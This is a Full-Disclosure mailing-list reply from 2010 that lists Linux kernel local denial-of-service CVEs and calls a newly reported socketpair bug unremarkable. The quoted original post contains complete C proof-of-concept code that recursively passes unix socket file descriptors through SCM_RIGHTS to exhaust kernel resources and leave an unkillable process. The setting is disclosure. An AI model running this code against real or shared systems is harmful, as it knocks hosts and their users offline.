It's funny to me that this should get special attention over any of the several dozen local DoS vulnerabilities that have been made public this year, starting with: CVE-2010-2954: NULL pointer dereference in IRDA CVE-2010-2960: NULL pointer dereference in keyctl CVE-2010-3066: NULL pointer dereference in io_submit_one() CVE-2010-3080: double free in oss CVE-2010-3086: kernel panic in futex handling CVE-2010-3442: non-exploitable heap corruption in sound/core CVE-2010-4163: OOM-killer invocation in block layer CVE-2010-4164: kernel panic in block layer CVE-2010-4175: out-of-bounds read in RDS CVE-2010-4161: deadlock in socket filters CVE-2010-4243: 64-bit OOM trigger The fix for this one is already committed or in the process of being worked on, if it's indeed a separate issue from the similar unix socketpair issue that was reported a couple days ago (http://marc.info/?l=linux-kernel&m=129055087923940&w=2), which is unclear at this time. In short: nothing especially out of the ordinary to see here. -Dan On Fri, Nov 26, 2010 at 9:58 AM, Key Night <key.night@xxxxxxxxxxxxxx> wrote: > Simple kernel attack using socketpair. easy, 100% reproductiblle, works > under guest. no way to protect :( > > Simple kernel attack using socketpair. easy, 100% reproductiblle, > works under guest. no way to protect :( > > > > See source attached. > > Process become in state 'Running' but not killalble via kill -KILL. > > eat 100% CPU, eat all available internal file descriptors in kernel :( > > -- > Segmentation fault > > > #include <sys/socket.h> > #include <sys/un.h> > > static int send_fd (int unix_fd, int fd) > { > struct msghdr msgh; > struct cmsghdr *cmsg; > char buf[CMSG_SPACE (sizeof (fd))]; > memset (&msgh, 0, sizeof (msgh)); > > > memset (buf, 0, sizeof (buf)); > > msgh.msg_control = buf; > msgh.msg_controllen = sizeof (buf); > > cmsg = CMSG_FIRSTHDR (&msgh); > cmsg->cmsg_len = CMSG_LEN (sizeof (fd)); > cmsg->cmsg_level = SOL_SOCKET; > > > cmsg->cmsg_type = SCM_RIGHTS; > > msgh.msg_controllen = cmsg->cmsg_len; > > memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd)); > return sendmsg (unix_fd, &msgh, 0); > } > > int main () > { > > int fd[2], ff[2]; > > int target; > if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1) > return 1; > for (;;) > { > if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1) > return 2; > send_fd (ff[0], fd[0]); > send_fd (ff[0], fd[1]); > > > close (fd[1]); > close (fd[0]); > fd[0] = ff[0]; > fd[1] = ff[1]; > } > } > > Source: http://lkml.org/lkml/2010/11/25/8 > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
